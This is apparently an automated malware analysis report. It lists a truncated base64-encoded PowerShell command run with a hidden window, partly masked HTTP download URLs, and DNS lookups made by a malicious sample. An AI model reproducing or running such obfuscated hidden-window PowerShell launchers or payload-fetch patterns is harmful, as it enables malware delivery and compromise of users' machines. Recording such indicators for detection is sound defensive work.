Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGYANwBzAGYAcQA5AD0AKAAnAEMAZwAzADIAJwArACcAYgBiAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgBUAGUATQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
Network activity
TCP
HTTP GET requests
- http://fh###ars.com/xxki_5q3t_2pc87c/
- http://fe###ngs504.com/cgi-bin/d_v_1ihokz5od7/
- http://www.as###dektor.com/cgi-bin/g_d_0f1ay2k3t/
- http://co###ompany.com/rs-plugin/4z0_0wb_4fh9tux1/
UDP
- DNS ASK fe#####citytours.com
- DNS ASK fh###ars.com
- DNS ASK fe###ngs504.com
- DNS ASK as###dektor.com
- DNS ASK co###ompany.com
- DNS ASK gu######ge.dothome.co.kr
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGYANwBzAGYAcQA5AD0AKAAnAEMAZwAzADIAJwArACcAYgBiAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAFYAOgBUAGUATQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (with hidden window)
